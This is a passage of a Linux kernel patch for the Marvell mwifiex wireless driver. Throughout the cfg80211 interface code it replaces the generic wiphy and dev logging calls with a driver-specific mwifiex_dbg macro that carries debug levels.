+ "info: ignore timeout value for IEEE Power Save\n"); ps_mode = enabled; @@ -370,7 +374,7 @@ mwifiex_cfg80211_set_default_key(struct wiphy *wiphy, struct net_device *netdev, priv->wep_key_curr_index = key_index; } else if (mwifiex_set_encode(priv, NULL, NULL, 0, key_index, NULL, 0)) { - wiphy_err(wiphy, "set default Tx key index\n"); + mwifiex_dbg(priv->adapter, ERROR, "set default Tx key index\n"); return -EFAULT; } @@ -407,7 +411,7 @@ mwifiex_cfg80211_add_key(struct wiphy *wiphy, struct net_device *netdev, if (mwifiex_set_encode(priv, params, params->key, params->key_len, key_index, peer_mac, 0)) { - wiphy_err(wiphy, "crypto keys added\n"); + mwifiex_dbg(priv->adapter, ERROR, "crypto keys added\n"); return -EFAULT; } @@ -442,7 +446,8 @@ static int mwifiex_send_domain_info_cmd_fw(struct wiphy *wiphy) band = mwifiex_band_to_radio_type(adapter->config_bands); if (!wiphy->bands[band]) { - wiphy_err(wiphy, "11D: setting domain info in FW\n"); + mwifiex_dbg(adapter, ERROR, + "11D: setting domain info in FW\n"); return -1; } @@ -493,7 +498,8 @@ static int mwifiex_send_domain_info_cmd_fw(struct wiphy *wiphy) if (mwifiex_send_cmd(priv, HostCmd_CMD_802_11D_DOMAIN_INFO, HostCmd_ACT_GEN_SET, 0, NULL, false)) { - wiphy_err(wiphy, "11D: setting domain info in FW\n"); + mwifiex_dbg(adapter, INFO, + "11D: setting domain info in FW\n"); return -1; } @@ -516,9 +522,9 @@ static void mwifiex_reg_notifier(struct wiphy *wiphy, struct mwifiex_adapter *adapter = mwifiex_cfg80211_get_adapter(wiphy); struct mwifiex_private *priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_ANY); - - wiphy_dbg(wiphy, "info: cfg80211 regulatory domain callback for %c%c\n", - request->alpha2[0], request->alpha2[1]); + mwifiex_dbg(adapter, INFO, + "info: cfg80211 regulatory domain callback for %c%c\n", + request->alpha2[0], request->alpha2[1]); switch (request->initiator) { case NL80211_REGDOM_SET_BY_DRIVER: @@ -527,8 +533,9 @@ static void mwifiex_reg_notifier(struct wiphy *wiphy, case NL80211_REGDOM_SET_BY_COUNTRY_IE: break; default: - wiphy_err(wiphy, "unknown regdom initiator: %d\n", - request->initiator); + mwifiex_dbg(adapter, ERROR, + "unknown regdom initiator: %d\n", + request->initiator); return; } @@ -597,8 +604,8 @@ mwifiex_cfg80211_set_wiphy_params(struct wiphy *wiphy, u32 changed) switch (priv->bss_role) { case MWIFIEX_BSS_ROLE_UAP: if (priv->bss_started) { - dev_err(adapter->dev, - "cannot change wiphy params when bss started"); + mwifiex_dbg(adapter, ERROR, + "cannot change wiphy params when bss started"); return -EINVAL; } @@ -622,15 +629,16 @@ mwifiex_cfg80211_set_wiphy_params(struct wiphy *wiphy, u32 changed) kfree(bss_cfg); if (ret) { - wiphy_err(wiphy, "Failed to set wiphy phy params\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to set wiphy phy params\n"); return ret; } break; case MWIFIEX_BSS_ROLE_STA: if (priv->media_connected) { - dev_err(adapter->dev, - "cannot change wiphy params when connected"); + mwifiex_dbg(adapter, ERROR, + "cannot change wiphy params when connected"); return -EINVAL; } if (changed & WIPHY_PARAM_RTS_THRESHOLD) { @@ -724,8 +732,8 @@ static int mwifiex_deinit_priv_params(struct mwifiex_private *priv) if (mwifiex_send_cmd(priv, HostCmd_CMD_MGMT_FRAME_REG, HostCmd_ACT_GEN_SET, 0, &priv->mgmt_frame_mask, false)) { - dev_warn(priv->adapter->dev, - "could not unregister mgmt frame rx\n"); + mwifiex_dbg(adapter, ERROR, + "could not unregister mgmt frame rx\n"); return -1; } @@ -789,9 +797,9 @@ mwifiex_init_new_priv_params(struct mwifiex_private *priv, priv->bss_role = MWIFIEX_BSS_ROLE_UAP; break; default: - dev_err(priv->adapter->dev, - "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } @@ -824,12 +832,13 @@ mwifiex_change_vif_to_p2p(struct net_device *dev, if (adapter->curr_iface_comb.p2p_intf == adapter->iface_limit.p2p_intf) { - dev_err(adapter->dev, - "cannot create multiple P2P ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple P2P ifaces\n"); return -1; } - dev_dbg(priv->adapter->dev, "%s: changing role to p2p\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to p2p\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -846,9 +855,9 @@ mwifiex_change_vif_to_p2p(struct net_device *dev, return -EFAULT; break; default: - dev_err(priv->adapter->dev, - "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } @@ -897,17 +906,17 @@ mwifiex_change_vif_to_sta_adhoc(struct net_device *dev, curr_iftype != NL80211_IFTYPE_P2P_GO) && (adapter->curr_iface_comb.sta_intf == adapter->iface_limit.sta_intf)) { - dev_err(adapter->dev, - "cannot create multiple station/adhoc ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple station/adhoc ifaces\n"); return -1; } if (type == NL80211_IFTYPE_STATION) - dev_notice(adapter->dev, - "%s: changing role to station\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to station\n", dev->name); else - dev_notice(adapter->dev, - "%s: changing role to adhoc\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to adhoc\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -954,12 +963,13 @@ mwifiex_change_vif_to_ap(struct net_device *dev, if (adapter->curr_iface_comb.uap_intf == adapter->iface_limit.uap_intf) { - dev_err(adapter->dev, - "cannot create multiple AP ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple AP ifaces\n"); return -1; } - dev_notice(adapter->dev, "%s: changing role to AP\n", dev->name); + mwifiex_dbg(adapter, INFO, + "%s: changing role to AP\n", dev->name); if (mwifiex_deinit_priv_params(priv)) return -1; @@ -1020,12 +1030,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as IBSS\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as IBSS\n", dev->name); case NL80211_IFTYPE_ADHOC: /* This shouldn't happen */ return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1048,12 +1060,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as STA\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as STA\n", dev->name); case NL80211_IFTYPE_STATION: /* This shouldn't happen */ return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1070,12 +1084,14 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_p2p(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as AP\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as AP\n", dev->name); case NL80211_IFTYPE_AP: /* This shouldn't happen */ return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; @@ -1100,19 +1116,22 @@ mwifiex_cfg80211_change_virtual_intf(struct wiphy *wiphy, return mwifiex_change_vif_to_ap(dev, curr_iftype, type, flags, params); case NL80211_IFTYPE_UNSPECIFIED: - wiphy_warn(wiphy, "%s: kept type as P2P\n", dev->name); + mwifiex_dbg(priv->adapter, INFO, + "%s: kept type as P2P\n", dev->name); case NL80211_IFTYPE_P2P_CLIENT: case NL80211_IFTYPE_P2P_GO: return 0; default: - wiphy_err(wiphy, "%s: changing to %d not supported\n", - dev->name, type); + mwifiex_dbg(priv->adapter, ERROR, + "%s: changing to %d not supported\n", + dev->name, type); return -EOPNOTSUPP; } break; default: - wiphy_err(wiphy, "%s: unknown iftype: %d\n", - dev->name, dev->ieee80211_ptr->iftype); + mwifiex_dbg(priv->adapter, ERROR, + "%s: unknown iftype: %d\n", + dev->name, dev->ieee80211_ptr->iftype); return -EOPNOTSUPP; } @@ -1206,12 +1225,14 @@ mwifiex_dump_station_info(struct mwifiex_private *priv, /* Get signal information from the firmware */ if (mwifiex_send_cmd(priv, HostCmd_CMD_RSSI_INFO, HostCmd_ACT_GEN_GET, 0, NULL, true)) { - dev_err(priv->adapter->dev, "failed to get signal information\n"); + mwifiex_dbg(priv->adapter, ERROR, + "failed to get signal information\n"); return -EFAULT; } if (mwifiex_drv_get_data_rate(priv, &rate)) { - dev_err(priv->adapter->dev, "getting data rate\n"); + mwifiex_dbg(priv->adapter, ERROR, + "getting data rate error\n"); return -EFAULT; } @@ -1295,7 +1316,7 @@ mwifiex_cfg80211_dump_survey(struct wiphy *wiphy, struct net_device *dev, struct mwifiex_chan_stats *pchan_stats = priv->adapter->chan_stats; enum ieee80211_band band; - dev_dbg(priv->adapter->dev, "dump_survey idx=%d\n", idx); + mwifiex_dbg(priv->adapter, DUMP, "dump_survey idx=%d\n", idx); memset(survey, 0, sizeof(struct survey_info)); @@ -1472,8 +1493,8 @@ static int mwifiex_cfg80211_set_bitrate_mask(struct wiphy *wiphy, struct mwifiex_adapter *adapter = priv->adapter; if (!priv->media_connected) { - dev_err(adapter->dev, - "Can not set Tx data rate in disconnected state\n"); + mwifiex_dbg(adapter, ERROR, + "Can not set Tx data rate in disconnected state\n"); return -EINVAL; } @@ -1556,17 +1577,20 @@ static int mwifiex_cfg80211_change_beacon(struct wiphy *wiphy, struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); if (GET_BSS_ROLE(priv) != MWIFIEX_BSS_ROLE_UAP) { - wiphy_err(wiphy, "%s: bss_type mismatched\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: bss_type mismatched\n", __func__); return -EINVAL; } if (!priv->bss_started) { - wiphy_err(wiphy, "%s: bss not started\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: bss not started\n", __func__); return -EINVAL; } if (mwifiex_set_mgmt_ies(priv, data)) { - wiphy_err(wiphy, "%s: setting mgmt ies failed\n", __func__); + mwifiex_dbg(priv->adapter, ERROR, + "%s: setting mgmt ies failed\n", __func__); return -EFAULT; } @@ -1594,7 +1618,8 @@ mwifiex_cfg80211_del_station(struct wiphy *wiphy, struct net_device *dev, if (!params->mac || is_broadcast_ether_addr(params->mac)) return 0; - wiphy_dbg(wiphy, "%s: mac address %pM\n", __func__, params->mac); + mwifiex_dbg(priv->adapter, INFO, "%s: mac address %pM\n", + __func__, params->mac); eth_zero_addr(deauth_mac); @@ -1687,14 +1712,16 @@ static int mwifiex_cfg80211_stop_ap(struct wiphy *wiphy, struct net_device *dev) mwifiex_abort_cac(priv); if (mwifiex_del_mgmt_ies(priv)) - wiphy_err(wiphy, "Failed to delete mgmt IEs!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to delete mgmt IEs!\n"); priv->ap_11n_enabled = 0; memset(&priv->bss_cfg, 0, sizeof(priv->bss_cfg)); if (mwifiex_send_cmd(priv, HostCmd_CMD_UAP_BSS_STOP, HostCmd_ACT_GEN_SET, 0, NULL, true)) { - wiphy_err(wiphy, "Failed to stop the BSS\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to stop the BSS\n"); return -1; } @@ -1756,7 +1783,8 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy, if (mwifiex_set_secure_params(priv, bss_cfg, params)) { kfree(bss_cfg); - wiphy_err(wiphy, "Failed to parse secuirty parameters!\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to parse secuirty parameters!\n"); return -1; } @@ -1778,17 +1806,19 @@ static int mwifiex_cfg80211_start_ap(struct wiphy *wiphy, if (mwifiex_is_11h_active(priv) && !cfg80211_chandef_dfs_required(wiphy, ¶ms->chandef, priv->bss_mode)) { - dev_dbg(priv->adapter->dev, "Disable 11h extensions in FW\n"); + mwifiex_dbg(priv->adapter, INFO, + "Disable 11h extensions in FW\n"); if (mwifiex_11h_activate(priv, false)) { - dev_err(priv->adapter->dev, - "Failed to disable 11h extensions!!"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to disable 11h extensions!!"); return -1; } priv->state_11h.is_11h_active = true; } if (mwifiex_config_start_uap(priv, bss_cfg)) { - wiphy_err(wiphy, "Failed to start AP\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Failed to start AP\n"); kfree(bss_cfg); return -1; } @@ -1816,8 +1846,9 @@ mwifiex_cfg80211_disconnect(struct wiphy *wiphy, struct net_device *dev, if (mwifiex_deauthenticate(priv, NULL)) return -EFAULT; - wiphy_dbg(wiphy, "info: successfully disconnected from %pM:" - " reason code %d\n", priv->cfg_bssid, reason_code); + mwifiex_dbg(priv->adapter, MSG, + "info: successfully disconnected from %pM:\t" + "reason code %d\n", priv->cfg_bssid, reason_code); eth_zero_addr(priv->cfg_bssid); priv->hs2_enabled = false; @@ -1899,13 +1930,13 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, req_ssid.ssid_len = ssid_len; if (ssid_len > IEEE80211_MAX_SSID_LEN) { - dev_err(priv->adapter->dev, "invalid SSID - aborting\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid SSID - aborting\n"); return -EINVAL; } memcpy(req_ssid.ssid, ssid, ssid_len); if (!req_ssid.ssid_len || req_ssid.ssid[0] < 0x20) { - dev_err(priv->adapter->dev, "invalid SSID - aborting\n"); + mwifiex_dbg(priv->adapter, ERROR, "invalid SSID - aborting\n"); return -EINVAL; } @@ -1959,9 +1990,9 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (sme->key) { if (mwifiex_is_alg_wep(priv->sec_info.encryption_mode)) { - dev_dbg(priv->adapter->dev, - "info: setting wep encryption" - " with key len %d\n", sme->key_len); + mwifiex_dbg(priv->adapter, INFO, + "info: setting wep encryption\t" + "with key len %d\n", sme->key_len); priv->wep_key_curr_index = sme->key_idx; ret = mwifiex_set_encode(priv, NULL, sme->key, sme->key_len, sme->key_idx, @@ -1978,7 +2009,7 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (is_scanning_required) { /* Do specific SSID scanning */ if (mwifiex_request_scan(priv, &req_ssid)) { - dev_err(priv->adapter->dev, "scan error\n"); + mwifiex_dbg(priv->adapter, ERROR, "scan error\n"); return -EFAULT; } } @@ -1997,15 +2028,15 @@ mwifiex_cfg80211_assoc(struct mwifiex_private *priv, size_t ssid_len, if (!bss) { if (is_scanning_required) { - dev_warn(priv->adapter->dev, - "assoc: requested bss not found in scan results\n"); + mwifiex_dbg(priv->adapter, WARN, + "assoc: requested bss not found in scan results\n"); break; } is_scanning_required = 1; } else { - dev_dbg(priv->adapter->dev, - "info: trying to associate to '%s' bssid %pM\n", - (char *) req_ssid.ssid, bss->bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: trying to associate to '%s' bssid %pM\n", + (char *)req_ssid.ssid, bss->bssid); memcpy(&priv->cfg_bssid, bss->bssid, ETH_ALEN); break; } @@ -2041,26 +2072,29 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, int ret; if (GET_BSS_ROLE(priv) != MWIFIEX_BSS_ROLE_STA) { - wiphy_err(wiphy, - "%s: reject infra assoc request in non-STA role\n", - dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: reject infra assoc request in non-STA role\n", + dev->name); return -EINVAL; } if (priv->wdev.current_bss) { - wiphy_warn(wiphy, "%s: already connected\n", dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: already connected\n", dev->name); return -EALREADY; } if (adapter->surprise_removed || adapter->is_cmd_timedout) { - wiphy_err(wiphy, - "%s: Ignore connection. Card removed or FW in bad state\n", - dev->name); + mwifiex_dbg(adapter, ERROR, + "%s: Ignore connection.\t" + "Card removed or FW in bad state\n", + dev->name); return -EFAULT; } - wiphy_dbg(wiphy, "info: Trying to associate to %s and bssid %pM\n", - (char *) sme->ssid, sme->bssid); + mwifiex_dbg(adapter, INFO, + "info: Trying to associate to %s and bssid %pM\n", + (char *)sme->ssid, sme->bssid); ret = mwifiex_cfg80211_assoc(priv, sme->ssid_len, sme->ssid, sme->bssid, priv->bss_mode, sme->channel, sme, 0); @@ -2068,17 +2102,17 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, cfg80211_connect_result(priv->netdev, priv->cfg_bssid, NULL, 0, NULL, 0, WLAN_STATUS_SUCCESS, GFP_KERNEL); - dev_dbg(priv->adapter->dev, - "info: associated to bssid %pM successfully\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: associated to bssid %pM successfully\n", + priv->cfg_bssid); if (ISSUPP_TDLS_ENABLED(priv->adapter->fw_cap_info) && priv->adapter->auto_tdls && priv->bss_type == MWIFIEX_BSS_TYPE_STA) mwifiex_setup_auto_tdls_timer(priv); } else { - dev_dbg(priv->adapter->dev, - "info: association to bssid %pM failed\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, ERROR, + "info: association to bssid %pM failed\n", + priv->cfg_bssid); eth_zero_addr(priv->cfg_bssid); if (ret > 0) @@ -2105,7 +2139,6 @@ mwifiex_cfg80211_connect(struct wiphy *wiphy, struct net_device *dev, static int mwifiex_set_ibss_params(struct mwifiex_private *priv, struct cfg80211_ibss_params *params) { - struct wiphy *wiphy = priv->wdev.wiphy; struct mwifiex_adapter *adapter = priv->adapter; int index = 0, i; u8 config_bands = 0; @@ -2162,8 +2195,10 @@ static int mwifiex_set_ibss_params(struct mwifiex_private *priv, priv->adhoc_channel = ieee80211_frequency_to_channel( params->chandef.chan->center_freq); - wiphy_dbg(wiphy, "info: set ibss band %d, chan %d, chan offset %d\n", - config_bands, priv->adhoc_channel, adapter->sec_chan_offset); + mwifiex_dbg(adapter, INFO, + "info: set ibss band %d, chan %d, chan offset %d\n", + config_bands, priv->adhoc_channel, + adapter->sec_chan_offset); return 0; } @@ -2182,13 +2217,15 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev, int ret = 0; if (priv->bss_mode != NL80211_IFTYPE_ADHOC) { - wiphy_err(wiphy, "request to join ibss received " - "when station is not in ibss mode\n"); + mwifiex_dbg(priv->adapter, ERROR, + "request to join ibss received\t" + "when station is not in ibss mode\n"); goto done; } - wiphy_dbg(wiphy, "info: trying to join to %s and bssid %pM\n", - (char *) params->ssid, params->bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: trying to join to %s and bssid %pM\n", + (char *)params->ssid, params->bssid); mwifiex_set_ibss_params(priv, params); @@ -2200,12 +2237,12 @@ mwifiex_cfg80211_join_ibss(struct wiphy *wiphy, struct net_device *dev, if (!ret) { cfg80211_ibss_joined(priv->netdev, priv->cfg_bssid, params->chandef.chan, GFP_KERNEL); - dev_dbg(priv->adapter->dev, - "info: joined/created adhoc network with bssid" - " %pM successfully\n", priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, + "info: joined/created adhoc network with bssid\t" + "%pM successfully\n", priv->cfg_bssid); } else { - dev_dbg(priv->adapter->dev, - "info: failed creating/joining adhoc network\n"); + mwifiex_dbg(priv->adapter, ERROR, + "info: failed creating/joining adhoc network\n"); } return ret; @@ -2222,8 +2259,8 @@ mwifiex_cfg80211_leave_ibss(struct wiphy *wiphy, struct net_device *dev) { struct mwifiex_private *priv = mwifiex_netdev_get_priv(dev); - wiphy_dbg(wiphy, "info: disconnecting from essid %pM\n", - priv->cfg_bssid); + mwifiex_dbg(priv->adapter, MSG, "info: disconnecting from essid %pM\n", + priv->cfg_bssid); if (mwifiex_deauthenticate(priv, NULL)) return -EFAULT; @@ -2250,13 +2287,15 @@ mwifiex_cfg80211_scan(struct wiphy *wiphy, struct ieee_types_header *ie; struct mwifiex_user_scan_cfg *user_scan_cfg; - wiphy_dbg(wiphy, "info: received scan request on %s\n", dev->name); + mwifiex_dbg(priv->adapter, CMD, + "info: received scan request on %s\n", dev->name); /* Block scan request if scan operation or scan cleanup when interface * is disabled is in process */ if (priv->scan_request || priv->scan_aborting) { - dev_err(priv->adapter->dev, "cmd: Scan already in process..\n"); + mwifiex_dbg(priv->adapter, WARN, + "cmd: Scan already in process..\n"); return -EBUSY; } @@ -2308,7 +2347,8 @@ mwifiex_cfg80211_scan(struct wiphy *wiphy, ret = mwifiex_scan_networks(priv, user_scan_cfg); kfree(user_scan_cfg); if (ret) { - dev_err(priv->adapter->dev, "scan failed: %d\n", ret); + mwifiex_dbg(priv->adapter, ERROR, + "scan failed: %d\n", ret); priv->scan_aborting = false; priv->scan_request = NULL; return ret; @@ -2454,15 +2494,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_ADHOC: if (adapter->curr_iface_comb.sta_intf == adapter->iface_limit.sta_intf) { - wiphy_err(wiphy, - "cannot create multiple sta/adhoc ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple sta/adhoc ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2484,15 +2524,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_AP: if (adapter->curr_iface_comb.uap_intf == adapter->iface_limit.uap_intf) { - wiphy_err(wiphy, - "cannot create multiple AP ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple AP ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2511,15 +2551,15 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, case NL80211_IFTYPE_P2P_CLIENT: if (adapter->curr_iface_comb.p2p_intf == adapter->iface_limit.p2p_intf) { - wiphy_err(wiphy, - "cannot create multiple P2P ifaces\n"); + mwifiex_dbg(adapter, ERROR, + "cannot create multiple P2P ifaces\n"); return ERR_PTR(-EINVAL); } priv = mwifiex_get_unused_priv(adapter); if (!priv) { - wiphy_err(wiphy, - "could not get free private struct\n"); + mwifiex_dbg(adapter, ERROR, + "could not get free private struct\n"); return ERR_PTR(-EFAULT); } @@ -2550,7 +2590,7 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, break; default: - wiphy_err(wiphy, "type not supported\n"); + mwifiex_dbg(adapter, ERROR, "type not supported\n"); return ERR_PTR(-EINVAL); } @@ -2558,7 +2598,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, name_assign_type, ether_setup, IEEE80211_NUM_ACS, 1); if (!dev) { - wiphy_err(wiphy, "no memory available for netdevice\n"); + mwifiex_dbg(adapter, ERROR, + "no memory available for netdevice\n"); memset(&priv->wdev, 0, sizeof(priv->wdev)); priv->wdev.iftype = NL80211_IFTYPE_UNSPECIFIED; priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; @@ -2599,7 +2640,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, /* Register network device */ if (register_netdevice(dev)) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2613,7 +2655,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, WQ_MEM_RECLAIM | WQ_UNBOUND, 1, name); if (!priv->dfs_cac_workqueue) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2628,7 +2671,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, WQ_HIGHPRI | WQ_UNBOUND | WQ_MEM_RECLAIM, 1, name); if (!priv->dfs_chan_sw_workqueue) { - wiphy_err(wiphy, "cannot register virtual network device\n"); + mwifiex_dbg(adapter, ERROR, + "cannot register virtual network device\n"); free_netdev(dev); priv->bss_mode = NL80211_IFTYPE_UNSPECIFIED; priv->netdev = NULL; @@ -2642,7 +2686,8 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, sema_init(&priv->async_sem, 1); - dev_dbg(adapter->dev, "info: %s: Marvell 802.11 Adapter\n", dev->name); + mwifiex_dbg(adapter, INFO, + "info: %s: Marvell 802.11 Adapter\n", dev->name); #ifdef CONFIG_DEBUG_FS mwifiex_dev_debugfs_init(priv); @@ -2661,7 +2706,7 @@ struct wireless_dev *mwifiex_add_virtual_intf(struct wiphy *wiphy, adapter->curr_iface_comb.p2p_intf++; break; default: - wiphy_err(wiphy, "type not supported\n"); + mwifiex_dbg(adapter, ERROR, "type not supported\n"); return ERR_PTR(-EINVAL); } @@ -2721,7 +2766,8 @@ int mwifiex_del_virtual_intf(struct wiphy *wiphy, struct wireless_dev *wdev) adapter->curr_iface_comb.p2p_intf++; break; default: - dev_err(adapter->dev, "del_virtual_intf: type not supported\n"); + mwifiex_dbg(adapter, ERROR, + "del_virtual_intf: type not supported\n"); break; } @@ -2839,7 +2885,8 @@ static int mwifiex_set_wowlan_mef_entry(struct mwifiex_private *priv, if (!mwifiex_is_pattern_supported(&wowlan->patterns[i], byte_seq, MWIFIEX_MEF_MAX_BYTESEQ)) { - dev_err(priv->adapter->dev, "Pattern not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Pattern not supported\n"); kfree(mef_entry); return -EOPNOTSUPP; } @@ -2954,21 +3001,22 @@ static int mwifiex_cfg80211_suspend(struct wiphy *wiphy, mwifiex_cancel_all_pending_cmd(adapter); if (!wowlan) { - dev_warn(adapter->dev, "None of the WOWLAN triggers enabled\n"); + mwifiex_dbg(adapter, ERROR, + "None of the WOWLAN triggers enabled\n"); return 0; } priv = mwifiex_get_priv(adapter, MWIFIEX_BSS_ROLE_STA); if (!priv->media_connected) { - dev_warn(adapter->dev, - "Can not configure WOWLAN in disconnected state\n"); + mwifiex_dbg(adapter, ERROR, + "Can not configure WOWLAN in disconnected state\n"); return 0; } ret = mwifiex_set_mef_filter(priv, wowlan); if (ret) { - dev_err(adapter->dev, "Failed to set MEF filter\n"); + mwifiex_dbg(adapter, ERROR, "Failed to set MEF filter\n"); return ret; } @@ -2981,7 +3029,8 @@ static int mwifiex_cfg80211_suspend(struct wiphy *wiphy, ret = mwifiex_set_hs_params(priv, HostCmd_ACT_GEN_SET, MWIFIEX_SYNC_CMD, &hs_cfg); if (ret) { - dev_err(adapter->dev, "Failed to set HS params\n"); + mwifiex_dbg(adapter, ERROR, + "Failed to set HS params\n"); return ret; } } @@ -3041,7 +3090,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, if (!mwifiex_is_pattern_supported(&crule->patterns[i], byte_seq, MWIFIEX_COALESCE_MAX_BYTESEQ)) { - dev_err(priv->adapter->dev, "Pattern not supported\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Pattern not supported\n"); return -EOPNOTSUPP; } @@ -3050,8 +3100,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, pkt_type = mwifiex_get_coalesce_pkt_type(byte_seq); if (pkt_type && mrule->pkt_type) { - dev_err(priv->adapter->dev, - "Multiple packet types not allowed\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Multiple packet types not allowed\n"); return -EOPNOTSUPP; } else if (pkt_type) { mrule->pkt_type = pkt_type; @@ -3074,8 +3124,8 @@ mwifiex_fill_coalesce_rule_info(struct mwifiex_private *priv, } if (!mrule->pkt_type) { - dev_err(priv->adapter->dev, - "Packet type can not be determined\n"); + mwifiex_dbg(priv->adapter, ERROR, + "Packet type can not be determined\n"); return -EOPNOTSUPP; } @@ -3093,8 +3143,8 @@ static int mwifiex_cfg80211_set_coalesce(struct wiphy *wiphy, memset(&coalesce_cfg, 0, sizeof(coalesce_cfg)); if (!coalesce) { - dev_dbg(adapter->dev, - "Disable coalesce and reset all previous rules\n"); + mwifiex_dbg(adapter, WARN, + "Disable coalesce and reset all previous rules\n"); return mwifiex_send_cmd(priv, HostCmd_CMD_COALESCE_CFG, HostCmd_ACT_GEN_SET, 0, &coalesce_cfg, true); @@ -3105,8 +3155,8 @@ static int mwifiex_cfg80211_set_coalesce(struct wiphy *wiphy, ret = mwifiex_fill_coalesce_rule_info(priv, &coalesce->rules[i], &coalesce_cfg.rule[i]); if (ret) { - dev_err(priv->adapter->dev, - "Recheck the patterns provided for rule %d\n", + mwifiex_dbg(adapter, ERROR, + "Recheck the patterns provided for rule %d\n", i + 1); return 